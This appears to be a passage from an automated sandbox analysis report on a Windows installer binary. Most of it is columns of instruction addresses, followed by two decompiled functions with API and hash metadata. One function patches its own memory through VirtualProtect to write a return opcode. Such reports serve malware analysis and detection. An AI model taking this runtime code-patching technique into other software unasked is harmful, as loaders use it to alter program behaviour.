                                                                                                            0x00405fde
                                                                                                            0x00405fe2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fe8
                                                                                                            0x00405feb
                                                                                                            0x00405fed
                                                                                                            0x00405fee
                                                                                                            0x00405ff1
                                                                                                            0x00405ff3
                                                                                                            0x00405ff4
                                                                                                            0x00405ff6
                                                                                                            0x00405ff9
                                                                                                            0x00405ffe
                                                                                                            0x00406003
                                                                                                            0x0040600c
                                                                                                            0x0040601f
                                                                                                            0x00406022
                                                                                                            0x0040602e
                                                                                                            0x00406056
                                                                                                            0x00406058
                                                                                                            0x00406066
                                                                                                            0x00406066
                                                                                                            0x0040606a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040605a
                                                                                                            0x0040605a
                                                                                                            0x0040605d
                                                                                                            0x0040605e
                                                                                                            0x0040605e
                                                                                                            0x00000000
                                                                                                            0x0040605a
                                                                                                            0x00406034
                                                                                                            0x00406039
                                                                                                            0x00406039
                                                                                                            0x00406042
                                                                                                            0x0040604a
                                                                                                            0x0040604d
                                                                                                            0x00000000
                                                                                                            0x00406053
                                                                                                            0x00406053
                                                                                                            0x00000000
                                                                                                            0x00406053
                                                                                                            0x00000000
                                                                                                            0x00406070
                                                                                                            0x00406070
                                                                                                            0x00406074
                                                                                                            0x00406920
                                                                                                            0x00000000
                                                                                                            0x00406920
                                                                                                            0x0040607d
                                                                                                            0x0040608d
                                                                                                            0x00406090
                                                                                                            0x00406093
                                                                                                            0x00406093
                                                                                                            0x00406093
                                                                                                            0x00406096
                                                                                                            0x0040609a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040609c
                                                                                                            0x004060a2
                                                                                                            0x004060cc
                                                                                                            0x004060d2
                                                                                                            0x004060d9
                                                                                                            0x00000000
                                                                                                            0x004060d9
                                                                                                            0x004060a8
                                                                                                            0x004060ab
                                                                                                            0x004060b0
                                                                                                            0x004060b0
                                                                                                            0x004060bb
                                                                                                            0x004060c3
                                                                                                            0x004060c6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040610b
                                                                                                            0x00406111
                                                                                                            0x00406114
                                                                                                            0x00406121
                                                                                                            0x00406129
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004060e0
                                                                                                            0x004060e0
                                                                                                            0x004060e4
                                                                                                            0x0040692f
                                                                                                            0x00000000
                                                                                                            0x0040692f
                                                                                                            0x004060f0
                                                                                                            0x004060fb
                                                                                                            0x004060fb
                                                                                                            0x004060fb
                                                                                                            0x004060fe
                                                                                                            0x00406101
                                                                                                            0x00406104
                                                                                                            0x00406109
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004067a0
                                                                                                            0x004067a0
                                                                                                            0x004067a6
                                                                                                            0x004067ac
                                                                                                            0x004067b2
                                                                                                            0x004067cc
                                                                                                            0x004067cf
                                                                                                            0x004067d5
                                                                                                            0x004067e0
                                                                                                            0x004067e2
                                                                                                            0x004067b4
                                                                                                            0x004067b4
                                                                                                            0x004067c3
                                                                                                            0x004067c7
                                                                                                            0x004067c7
                                                                                                            0x004067ec
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406131
                                                                                                            0x00406133
                                                                                                            0x00406136
                                                                                                            0x004061a7
                                                                                                            0x004061aa
                                                                                                            0x004061ad
                                                                                                            0x004061b4
                                                                                                            0x004061be
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x00406138
                                                                                                            0x0040613c
                                                                                                            0x0040613f
                                                                                                            0x00406141
                                                                                                            0x00406144
                                                                                                            0x00406147
                                                                                                            0x00406149
                                                                                                            0x0040614c
                                                                                                            0x0040614e
                                                                                                            0x00406153
                                                                                                            0x00406156
                                                                                                            0x00406159
                                                                                                            0x0040615d
                                                                                                            0x00406164
                                                                                                            0x00406167
                                                                                                            0x0040616e
                                                                                                            0x00406172
                                                                                                            0x0040617a
                                                                                                            0x0040617a
                                                                                                            0x0040617a
                                                                                                            0x00406174
                                                                                                            0x00406174
                                                                                                            0x00406174
                                                                                                            0x00406169
                                                                                                            0x00406169
                                                                                                            0x00406169
                                                                                                            0x0040617e
                                                                                                            0x00406181
                                                                                                            0x0040619f
                                                                                                            0x004061a1
                                                                                                            0x00000000
                                                                                                            0x00406183
                                                                                                            0x00406183
                                                                                                            0x00406186
                                                                                                            0x00406189
                                                                                                            0x0040618c
                                                                                                            0x0040618e
                                                                                                            0x0040618e
                                                                                                            0x0040618e
                                                                                                            0x00406191
                                                                                                            0x00406194
                                                                                                            0x00406196
                                                                                                            0x00406197
                                                                                                            0x0040619a
                                                                                                            0x00000000
                                                                                                            0x0040619a
                                                                                                            0x00000000
                                                                                                            0x004063d0
                                                                                                            0x004063d4
                                                                                                            0x004063f2
                                                                                                            0x004063f5
                                                                                                            0x004063fc
                                                                                                            0x004063ff
                                                                                                            0x00406402
                                                                                                            0x00406405
                                                                                                            0x00406408
                                                                                                            0x0040640b
                                                                                                            0x0040640d
                                                                                                            0x00406414
                                                                                                            0x00406415
                                                                                                            0x00406417
                                                                                                            0x0040641a
                                                                                                            0x0040641d
                                                                                                            0x00406420
                                                                                                            0x00406420
                                                                                                            0x00406425
                                                                                                            0x00000000
                                                                                                            0x00406425
                                                                                                            0x004063d6
                                                                                                            0x004063d9
                                                                                                            0x004063dc
                                                                                                            0x004063e6
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040647d
                                                                                                            0x00406481
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406487
                                                                                                            0x0040648b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406491
                                                                                                            0x00406493
                                                                                                            0x00406497
                                                                                                            0x00406497
                                                                                                            0x0040649a
                                                                                                            0x0040649e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004064ee
                                                                                                            0x004064f2
                                                                                                            0x004064f9
                                                                                                            0x004064fc
                                                                                                            0x004064ff
                                                                                                            0x00406509
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x004064f4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406515
                                                                                                            0x00406519
                                                                                                            0x00406520
                                                                                                            0x00406523
                                                                                                            0x00406526
                                                                                                            0x0040651b
                                                                                                            0x0040651b
                                                                                                            0x0040651b
                                                                                                            0x00406529
                                                                                                            0x0040652c
                                                                                                            0x0040652f
                                                                                                            0x0040652f
                                                                                                            0x00406532
                                                                                                            0x00406535
                                                                                                            0x00406538
                                                                                                            0x00406538
                                                                                                            0x0040653b
                                                                                                            0x00406542
                                                                                                            0x00406547
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004065d5
                                                                                                            0x004065d5
                                                                                                            0x004065d9
                                                                                                            0x00406977
                                                                                                            0x00000000
                                                                                                            0x00406977
                                                                                                            0x004065df
                                                                                                            0x004065e2
                                                                                                            0x004065e5
                                                                                                            0x004065e9
                                                                                                            0x004065ec
                                                                                                            0x004065f2
                                                                                                            0x004065f4
                                                                                                            0x004065f4
                                                                                                            0x004065f4
                                                                                                            0x004065f7
                                                                                                            0x004065fa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004061ca
                                                                                                            0x004061ca
                                                                                                            0x004061ce
                                                                                                            0x0040693b
                                                                                                            0x00000000
                                                                                                            0x0040693b
                                                                                                            0x004061d4
                                                                                                            0x004061d7
                                                                                                            0x004061da
                                                                                                            0x004061de
                                                                                                            0x004061e1
                                                                                                            0x004061e7
                                                                                                            0x004061e9
                                                                                                            0x004061e9
                                                                                                            0x004061e9
                                                                                                            0x004061ec
                                                                                                            0x004061ef
                                                                                                            0x004061ef
                                                                                                            0x004061f2
                                                                                                            0x004061f5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004061fb
                                                                                                            0x00406201
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406207
                                                                                                            0x00406207
                                                                                                            0x0040620b
                                                                                                            0x0040620e
                                                                                                            0x00406211
                                                                                                            0x00406214
                                                                                                            0x00406217
                                                                                                            0x00406218
                                                                                                            0x0040621b
                                                                                                            0x0040621d
                                                                                                            0x00406223
                                                                                                            0x00406226
                                                                                                            0x00406229
                                                                                                            0x0040622c
                                                                                                            0x0040622f
                                                                                                            0x00406232
                                                                                                            0x00406235
                                                                                                            0x00406251
                                                                                                            0x00406254
                                                                                                            0x00406257
                                                                                                            0x0040625a
                                                                                                            0x00406261
                                                                                                            0x00406265
                                                                                                            0x00406267
                                                                                                            0x0040626b
                                                                                                            0x00406237
                                                                                                            0x00406237
                                                                                                            0x0040623b
                                                                                                            0x00406243
                                                                                                            0x00406248
                                                                                                            0x0040624a
                                                                                                            0x0040624c
                                                                                                            0x0040624c
                                                                                                            0x0040626e
                                                                                                            0x00406275
                                                                                                            0x00406278
                                                                                                            0x00000000
                                                                                                            0x0040627e
                                                                                                            0x00000000
                                                                                                            0x0040627e
                                                                                                            0x00000000
                                                                                                            0x00406283
                                                                                                            0x00406283
                                                                                                            0x00406287
                                                                                                            0x00406947
                                                                                                            0x00000000
                                                                                                            0x00406947
                                                                                                            0x0040628d
                                                                                                            0x00406290
                                                                                                            0x00406293
                                                                                                            0x00406297
                                                                                                            0x0040629a
                                                                                                            0x004062a0
                                                                                                            0x004062a2
                                                                                                            0x004062a2
                                                                                                            0x004062a2
                                                                                                            0x004062a5
                                                                                                            0x004062a8
                                                                                                            0x004062a8
                                                                                                            0x004062a8
                                                                                                            0x004062ae
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004062b0
                                                                                                            0x004062b3
                                                                                                            0x004062b6
                                                                                                            0x004062b9
                                                                                                            0x004062bc
                                                                                                            0x004062bf
                                                                                                            0x004062c2
                                                                                                            0x004062c5
                                                                                                            0x004062c8
                                                                                                            0x004062cb
                                                                                                            0x004062ce
                                                                                                            0x004062e6
                                                                                                            0x004062e9
                                                                                                            0x004062ec
                                                                                                            0x004062ef
                                                                                                            0x004062ef
                                                                                                            0x004062f2
                                                                                                            0x004062f6
                                                                                                            0x004062f8
                                                                                                            0x004062d0
                                                                                                            0x004062d0
                                                                                                            0x004062d8
                                                                                                            0x004062dd
                                                                                                            0x004062df
                                                                                                            0x004062e1
                                                                                                            0x004062e1
                                                                                                            0x004062fb
                                                                                                            0x00406302
                                                                                                            0x00406305
                                                                                                            0x00000000
                                                                                                            0x00406307
                                                                                                            0x00000000
                                                                                                            0x00406307
                                                                                                            0x00406305
                                                                                                            0x0040630c
                                                                                                            0x0040630c
                                                                                                            0x0040630c
                                                                                                            0x0040630c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406347
                                                                                                            0x00406347
                                                                                                            0x0040634b
                                                                                                            0x00406953
                                                                                                            0x00000000
                                                                                                            0x00406953
                                                                                                            0x00406351
                                                                                                            0x00406354
                                                                                                            0x00406357
                                                                                                            0x0040635b
                                                                                                            0x0040635e
                                                                                                            0x00406364
                                                                                                            0x00406366
                                                                                                            0x00406366
                                                                                                            0x00406366
                                                                                                            0x00406369
                                                                                                            0x0040636c
                                                                                                            0x0040636c
                                                                                                            0x00406372
                                                                                                            0x00406310
                                                                                                            0x00406310
                                                                                                            0x00406313
                                                                                                            0x00000000
                                                                                                            0x00406313
                                                                                                            0x00406374
                                                                                                            0x00406374
                                                                                                            0x00406377
                                                                                                            0x0040637a
                                                                                                            0x0040637d
                                                                                                            0x00406380
                                                                                                            0x00406383
                                                                                                            0x00406386
                                                                                                            0x00406389
                                                                                                            0x0040638c
                                                                                                            0x0040638f
                                                                                                            0x00406392
                                                                                                            0x004063aa
                                                                                                            0x004063ad
                                                                                                            0x004063b0
                                                                                                            0x004063b3
                                                                                                            0x004063b3
                                                                                                            0x004063b6
                                                                                                            0x004063ba
                                                                                                            0x004063bc
                                                                                                            0x00406394
                                                                                                            0x00406394
                                                                                                            0x0040639c
                                                                                                            0x004063a1
                                                                                                            0x004063a3
                                                                                                            0x004063a5
                                                                                                            0x004063a5
                                                                                                            0x004063bf
                                                                                                            0x004063c6
                                                                                                            0x004063c9
                                                                                                            0x00000000
                                                                                                            0x004063cb
                                                                                                            0x00000000
                                                                                                            0x004063cb
                                                                                                            0x00000000
                                                                                                            0x00406658
                                                                                                            0x00406658
                                                                                                            0x0040665c
                                                                                                            0x00406983
                                                                                                            0x00000000
                                                                                                            0x00406983
                                                                                                            0x00406662
                                                                                                            0x00406665
                                                                                                            0x00406668
                                                                                                            0x0040666c
                                                                                                            0x0040666f
                                                                                                            0x00406675
                                                                                                            0x00406677
                                                                                                            0x00406677
                                                                                                            0x00406677
                                                                                                            0x0040667a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406428
                                                                                                            0x00406428
                                                                                                            0x0040642b
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x00406767
                                                                                                            0x0040676b
                                                                                                            0x0040678d
                                                                                                            0x00406790
                                                                                                            0x0040679a
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x0040676d
                                                                                                            0x00406770
                                                                                                            0x00406774
                                                                                                            0x00406777
                                                                                                            0x00406777
                                                                                                            0x0040677a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406824
                                                                                                            0x00406828
                                                                                                            0x00406846
                                                                                                            0x00406846
                                                                                                            0x00406846
                                                                                                            0x0040684d
                                                                                                            0x00406854
                                                                                                            0x0040685b
                                                                                                            0x0040685b
                                                                                                            0x00000000
                                                                                                            0x0040685b
                                                                                                            0x0040682a
                                                                                                            0x0040682d
                                                                                                            0x00406830
                                                                                                            0x00406833
                                                                                                            0x0040683a
                                                                                                            0x0040677e
                                                                                                            0x0040677e
                                                                                                            0x00406781
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406915
                                                                                                            0x00406918
                                                                                                            0x00406819
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040654f
                                                                                                            0x00406551
                                                                                                            0x00406558
                                                                                                            0x00406559
                                                                                                            0x0040655b
                                                                                                            0x0040655e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406566
                                                                                                            0x00406569
                                                                                                            0x0040656c
                                                                                                            0x0040656e
                                                                                                            0x00406570
                                                                                                            0x00406570
                                                                                                            0x00406571
                                                                                                            0x00406574
                                                                                                            0x0040657b
                                                                                                            0x0040657e
                                                                                                            0x0040658c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406862
                                                                                                            0x00406862
                                                                                                            0x00406865
                                                                                                            0x0040686c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406871
                                                                                                            0x00406871
                                                                                                            0x00406875
                                                                                                            0x004069ad
                                                                                                            0x00000000
                                                                                                            0x004069ad
                                                                                                            0x0040687b
                                                                                                            0x0040687e
                                                                                                            0x00406881
                                                                                                            0x00406885
                                                                                                            0x00406888
                                                                                                            0x0040688e
                                                                                                            0x00406890
                                                                                                            0x00406890
                                                                                                            0x00406890
                                                                                                            0x00406893
                                                                                                            0x00406896
                                                                                                            0x00406896
                                                                                                            0x00406896
                                                                                                            0x00406896
                                                                                                            0x00406899
                                                                                                            0x00406899
                                                                                                            0x0040689d
                                                                                                            0x004068fd
                                                                                                            0x00406900
                                                                                                            0x00406905
                                                                                                            0x00406906
                                                                                                            0x00406908
                                                                                                            0x0040690a
                                                                                                            0x0040690d
                                                                                                            0x00406819
                                                                                                            0x00406819
                                                                                                            0x00000000
                                                                                                            0x0040681f
                                                                                                            0x00406819
                                                                                                            0x0040689f
                                                                                                            0x004068a5
                                                                                                            0x004068a8
                                                                                                            0x004068ab
                                                                                                            0x004068ae
                                                                                                            0x004068b1
                                                                                                            0x004068b4
                                                                                                            0x004068b7
                                                                                                            0x004068ba
                                                                                                            0x004068bd
                                                                                                            0x004068c0
                                                                                                            0x004068d9
                                                                                                            0x004068dc
                                                                                                            0x004068df
                                                                                                            0x004068e2
                                                                                                            0x004068e6
                                                                                                            0x004068e8
                                                                                                            0x004068e8
                                                                                                            0x004068e9
                                                                                                            0x004068ec
                                                                                                            0x004068c2
                                                                                                            0x004068c2
                                                                                                            0x004068ca
                                                                                                            0x004068cf
                                                                                                            0x004068d1
                                                                                                            0x004068d4
                                                                                                            0x004068d4
                                                                                                            0x004068ef
                                                                                                            0x004068f6
                                                                                                            0x00000000
                                                                                                            0x004068f8
                                                                                                            0x00000000
                                                                                                            0x004068f8
                                                                                                            0x00000000
                                                                                                            0x00406594
                                                                                                            0x00406597
                                                                                                            0x004065cd
                                                                                                            0x004066fd
                                                                                                            0x004066fd
                                                                                                            0x004066fd
                                                                                                            0x004066fd
                                                                                                            0x00406700
                                                                                                            0x00406700
                                                                                                            0x00406703
                                                                                                            0x00406705
                                                                                                            0x0040698f
                                                                                                            0x00000000
                                                                                                            0x0040698f
                                                                                                            0x0040670b
                                                                                                            0x0040670e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406714
                                                                                                            0x00406718
                                                                                                            0x0040671b
                                                                                                            0x0040671b
                                                                                                            0x0040671b
                                                                                                            0x00000000
                                                                                                            0x0040671b
                                                                                                            0x00406599
                                                                                                            0x0040659b
                                                                                                            0x0040659d
                                                                                                            0x0040659f
                                                                                                            0x004065a2
                                                                                                            0x004065a3
                                                                                                            0x004065a5
                                                                                                            0x004065a7
                                                                                                            0x004065aa
                                                                                                            0x004065ad
                                                                                                            0x004065c3
                                                                                                            0x004065c8
                                                                                                            0x00406600
                                                                                                            0x00406600
                                                                                                            0x00406604
                                                                                                            0x00406630
                                                                                                            0x00406632
                                                                                                            0x00406639
                                                                                                            0x0040663c
                                                                                                            0x0040663f
                                                                                                            0x0040663f
                                                                                                            0x00406644
                                                                                                            0x00406644
                                                                                                            0x00406646
                                                                                                            0x00406649
                                                                                                            0x00406650
                                                                                                            0x00406653
                                                                                                            0x00406680
                                                                                                            0x00406680
                                                                                                            0x00406683
                                                                                                            0x00406686
                                                                                                            0x004066fa
                                                                                                            0x004066fa
                                                                                                            0x004066fa
                                                                                                            0x00000000
                                                                                                            0x004066fa
                                                                                                            0x00406688
                                                                                                            0x0040668e
                                                                                                            0x00406691
                                                                                                            0x00406694
                                                                                                            0x00406697
                                                                                                            0x0040669a
                                                                                                            0x0040669d
                                                                                                            0x004066a0
                                                                                                            0x004066a3
                                                                                                            0x004066a6
                                                                                                            0x004066a9
                                                                                                            0x004066c2
                                                                                                            0x004066c4
                                                                                                            0x004066c7
                                                                                                            0x004066c8
                                                                                                            0x004066cb
                                                                                                            0x004066cd
                                                                                                            0x004066d0
                                                                                                            0x004066d2
                                                                                                            0x004066d4
                                                                                                            0x004066d7
                                                                                                            0x004066d9
                                                                                                            0x004066dc
                                                                                                            0x004066e0
                                                                                                            0x004066e2
                                                                                                            0x004066e2
                                                                                                            0x004066e3
                                                                                                            0x004066e6
                                                                                                            0x004066e9
                                                                                                            0x004066ab
                                                                                                            0x004066ab
                                                                                                            0x004066b3
                                                                                                            0x004066b8
                                                                                                            0x004066ba
                                                                                                            0x004066bd
                                                                                                            0x004066bd
                                                                                                            0x004066ec
                                                                                                            0x004066f3
                                                                                                            0x0040667d
                                                                                                            0x0040667d
                                                                                                            0x0040667d
                                                                                                            0x0040667d
                                                                                                            0x00000000
                                                                                                            0x004066f5
                                                                                                            0x00000000
                                                                                                            0x004066f5
                                                                                                            0x004066f3
                                                                                                            0x00406606
                                                                                                            0x00406609
                                                                                                            0x0040660b
                                                                                                            0x0040660e
                                                                                                            0x00406611
                                                                                                            0x00406614
                                                                                                            0x00406616
                                                                                                            0x00406619
                                                                                                            0x0040661c
                                                                                                            0x0040661c
                                                                                                            0x0040661f
                                                                                                            0x0040661f
                                                                                                            0x00406622
                                                                                                            0x00406629
                                                                                                            0x004065fd
                                                                                                            0x004065fd
                                                                                                            0x004065fd
                                                                                                            0x004065fd
                                                                                                            0x00000000
                                                                                                            0x0040662b
                                                                                                            0x00000000
                                                                                                            0x0040662b
                                                                                                            0x00406629
                                                                                                            0x004065af
                                                                                                            0x004065b2
                                                                                                            0x004065b4
                                                                                                            0x004065b7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406316
                                                                                                            0x00406316
                                                                                                            0x0040631a
                                                                                                            0x0040695f
                                                                                                            0x00000000
                                                                                                            0x0040695f
                                                                                                            0x00406320
                                                                                                            0x00406323
                                                                                                            0x00406326
                                                                                                            0x00406329
                                                                                                            0x0040632c
                                                                                                            0x0040632f
                                                                                                            0x00406332
                                                                                                            0x00406334
                                                                                                            0x00406337
                                                                                                            0x0040633a
                                                                                                            0x0040633d
                                                                                                            0x0040633f
                                                                                                            0x0040633f
                                                                                                            0x0040633f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004064a1
                                                                                                            0x004064a1
                                                                                                            0x004064a5
                                                                                                            0x0040696b
                                                                                                            0x00000000
                                                                                                            0x0040696b
                                                                                                            0x004064ab
                                                                                                            0x004064ae
                                                                                                            0x004064b1
                                                                                                            0x004064b4
                                                                                                            0x004064b6
                                                                                                            0x004064b6
                                                                                                            0x004064b6
                                                                                                            0x004064b9
                                                                                                            0x004064bc
                                                                                                            0x004064bf
                                                                                                            0x004064c2
                                                                                                            0x004064c5
                                                                                                            0x004064c8
                                                                                                            0x004064c9
                                                                                                            0x004064cb
                                                                                                            0x004064cb
                                                                                                            0x004064cb
                                                                                                            0x004064ce
                                                                                                            0x004064d1
                                                                                                            0x004064d4
                                                                                                            0x004064d7
                                                                                                            0x004064d7
                                                                                                            0x004064d7
                                                                                                            0x004064da
                                                                                                            0x004064dc
                                                                                                            0x004064dc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040671e
                                                                                                            0x0040671e
                                                                                                            0x0040671e
                                                                                                            0x00406722
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406728
                                                                                                            0x0040672b
                                                                                                            0x0040672e
                                                                                                            0x00406731
                                                                                                            0x00406733
                                                                                                            0x00406733
                                                                                                            0x00406733
                                                                                                            0x00406736
                                                                                                            0x00406739
                                                                                                            0x0040673c
                                                                                                            0x0040673f
                                                                                                            0x00406742
                                                                                                            0x00406745
                                                                                                            0x00406746
                                                                                                            0x00406748
                                                                                                            0x00406748
                                                                                                            0x00406748
                                                                                                            0x0040674b
                                                                                                            0x0040674e
                                                                                                            0x00406751
                                                                                                            0x00406754
                                                                                                            0x00406757
                                                                                                            0x0040675b
                                                                                                            0x0040675d
                                                                                                            0x00406760
                                                                                                            0x00000000
                                                                                                            0x00406762
                                                                                                            0x004064df
                                                                                                            0x004064df
                                                                                                            0x00000000
                                                                                                            0x004064df
                                                                                                            0x00406760
                                                                                                            0x00406995
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fc4
                                                                                                            0x004069cc
                                                                                                            0x004069cc
                                                                                                            0x00000000
                                                                                                            0x004069cc
                                                                                                            0x00406819
                                                                                                            0x004067a0
                                                                                                            0x0040679d

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c10b0ec6d8a1716373c4594016b158d4b4e2bf5790cbb1f15a9d43b973b4a336
                                                                                                            • Instruction ID: fa01dbb36adddbb747bc37ce8d7c8691094d52a97b4972d7f98645f49a39bfe1
                                                                                                            • Opcode Fuzzy Hash: c10b0ec6d8a1716373c4594016b158d4b4e2bf5790cbb1f15a9d43b973b4a336
                                                                                                            • Instruction Fuzzy Hash: B3715671D00229CBEF28CF98C844BADBBB1FF44305F11816AD856BB281C7795A56DF54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 73612921, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x73614038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x7361404c, 4, 0x40, 0x7361403c); // executed
					 *0x7361404c = 0xc2;
					 *0x7361403c = 0;
					 *0x73614044 = 0;
					 *0x73614058 = 0;
					 *0x73614048 = 0;
					 *0x73614040 = 0;
					 *0x73614050 = 0;
					 *0x7361404e = 0;
				}
				return 1;
			}



                                                                                                            0x7361292a
                                                                                                            0x7361292f
                                                                                                            0x7361293f
                                                                                                            0x73612947
                                                                                                            0x7361294e
                                                                                                            0x73612953
                                                                                                            0x73612958
                                                                                                            0x7361295d
                                                                                                            0x73612962
                                                                                                            0x73612967
                                                                                                            0x7361296c
                                                                                                            0x7361296c
                                                                                                            0x73612974

                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(7361404C,00000004,00000040,7361403C), ref: 7361293F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.344646038.0000000073611000.00000020.00020000.sdmp, Offset: 73610000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.344639568.0000000073610000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.344652091.0000000073613000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.344660536.0000000073615000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID: `gxt@Mxt
                                                                                                            • API String ID: 544645111-1126417519
                                                                                                            • Opcode ID: 2ea0c05c0ab36464d1b8613871811ed0b3f00df539c312fe13c990dd8c82aab3
                                                                                                            • Instruction ID: e9dcdcf5e6a3b832eaa3aa130063a1c861f5ec25e783a2c6cf11900bdf7ffe9c
                                                                                                            • Opcode Fuzzy Hash: 2ea0c05c0ab36464d1b8613871811ed0b3f00df539c312fe13c990dd8c82aab3
                                                                                                            • Instruction Fuzzy Hash: 0DF092B36082A1DEC362EF6B8448B053EF1A328296B2A452BE59CDB289F3344154CF11
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 69%
                                                                                                            			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423ed0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}











                                                                                                            0x0040138a
                                                                                                            0x004013fa
                                                                                                            0x0040139b
                                                                                                            0x004013a0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004013a2
                                                                                                            0x004013a3
                                                                                                            0x004013ad
                                                                                                            0x00000000
                                                                                                            0x00401404
                                                                                                            0x004013b0
                                                                                                            0x004013b7
                                                                                                            0x004013bd
                                                                                                            0x004013be
                                                                                                            0x004013c0
                                                                                                            0x004013c2
                                                                                                            0x004013b9
                                                                                                            0x004013b9
                                                                                                            0x004013ba
                                                                                                            0x004013ba
                                                                                                            0x004013c9
                                                                                                            0x004013cb
                                                                                                            0x004013f4
                                                                                                            0x004013f4
                                                                                                            0x004013c9
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                            • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
